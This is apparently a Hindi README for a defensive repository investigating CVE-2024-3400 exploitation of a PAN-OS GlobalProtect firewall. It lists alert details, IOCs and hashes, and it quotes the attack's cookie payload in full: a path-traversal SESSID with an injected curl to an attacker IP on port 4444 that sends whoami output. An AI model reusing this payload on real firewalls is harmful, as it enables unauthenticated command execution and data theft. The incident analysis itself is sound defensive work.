
Palo Alto PAN-OS GlobalProtect पोर्टल्स को लक्षित करने वाले CVE-2024-3400 शोषण प्रयासों के लिए पहचान, विश्लेषण और प्रतिक्रिया रणनीतियाँ। इसमें IOCs, शोषण पैटर्न और शमन मार्गदर्शन शामिल हैं।
CVE-2024-3400 शोषण प्रयासों की पहचान, विश्लेषण और प्रतिक्रिया रणनीतियाँ जो Palo Alto PAN-OS GlobalProtect पोर्टल्स को लक्षित करती हैं। IOCs, शोषण पैटर्न और शमन मार्गदर्शन शामिल हैं।
इस रिपॉजिटरी में CVE-2024-3400 की विस्तृत जांच और खतरा विश्लेषण शामिल है, जो Palo Alto Networks PAN-OS सॉफ़्टवेयर को प्रभावित करने वाली एक महत्वपूर्ण अप्रमाणित कमांड इंजेक्शन भेद्यता है, जो विशेष रूप से GlobalProtect पोर्टल को लक्षित करती है।
18 अप्रैल, 2024 को, कमजोर /global-protect/login.esp एंडपॉइंट का उपयोग करके एक आंतरिक PAN-OS फ़ायरवॉल के खिलाफ शोषण गतिविधि का पता चला। हमलावर ने एक निर्मित SESSID कुकी का उपयोग किया जिसमें एक बैकटिक-निष्पादित curl कमांड था, जो 144.172.79.92 (मियामी, फ्लोरिडा) पर होस्ट किए गए रिमोट C2 सर्वर तक पहुँचने के लिए था। शोषण पेलोड ने सरल फिल्टर को बायपास करने के लिए ${IFS} का लाभ उठाया और दुर्भावनापूर्ण गतिविधि को मंचित करने के लिए PAN-OS की टेलीमेट्री निर्देशिका का उपयोग किया। फ़ायरवॉल ने 200 OK के साथ प्रतिक्रिया दी, जो दर्शाता है कि पेलोड संभवतः सफलतापूर्वक निष्पादित हुआ।

ईवेंट आईडी: 249
पहचान नियम: SOC274 – PAN-OS कमांड इंजेक्शन शोषण
ईवेंट समय: 18 अप्रैल, 2024, 03:09 AM UTC
होस्टनाम: PA-Firewall-01
गंतव्य आईपी: 172.16.17.139
स्रोत आईपी: 144.172.79.92
अनुरोध विधि: POST
एंडपॉइंट: /global-protect/login.esp
कुकी पेलोड: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
दुर्भावनापूर्ण हैश:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
दुर्भावनापूर्ण स्क्रिप्ट: update.py ( का उपयोग करके निष्पादित)





SESSID का दुरुपयोग${IFS} का उपयोग/opt/panlogs/tmp/device_telemetry में पेलोड स्टेजिंगdt_send प्रक्रिया की भागीदारी4444 पर हमलावर के आईपी पर नेटवर्क कॉलबैक


10.2.9-h1, 11.0.4-h1, या 11.1.2-h3144.172.79.92logs/: पार्स किए गए और कच्चे पहचान लॉगioc/: हमले से जुड़े फ़ाइल हैश और आईपीanalysis/: शोषण व्यवहार और प्रक्रिया अनुरेखण में गहराई से जानकारीreport/: मेरी जांच के लॉग और कोड का सारांश और चित्रCVE-2024-3400 Palo Alto Networks PAN-OS में एक महत्वपूर्ण भेद्यता को संदर्भित करता है, जो विशेष रूप से GlobalProtect गेटवे को प्रभावित करता है। यहाँ इसके बारे में सार्वजनिक रूप से ज्ञात जानकारी का विवरण दिया गया है:
CVSS स्कोर: 10.0 (गंभीर)
प्रकाशित: अप्रैल 2024
प्रभावित उत्पाद: PAN-OS 10.2, 11.0, और 11.1 जब GlobalProtect सक्षम हो।
शोषण: वास्तविक दुनिया में पुष्टि (ज़ीरो-डे)
भेद्यता प्रकार: अप्रमाणित कमांड इंजेक्शन
CVE-2024-3400 अप्रमाणित हमलावरों को फ़ायरवॉल के ऑपरेटिंग सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देता है। यह अनिवार्य रूप से क्रेडेंशियल्स की आवश्यकता के बिना प्रभावित उपकरणों पर पूर्ण नियंत्रण देता है — Palo Alto फ़ायरवॉल पर निर्भर किसी भी उद्यम के लिए एक गंभीर उल्लंघन बिंदु।
यह रिपॉजिटरी एक आंतरिक जांच रिपोर्ट और PAN-OS भेद्यताओं के वास्तविक दुनिया के शोषण को समझने के इच्छुक रक्षकों के लिए एक शैक्षिक संसाधन के रूप में कार्य करती है। योगदान और अतिरिक्त टिप्पणियों का स्वागत है।
/usr/bin/python3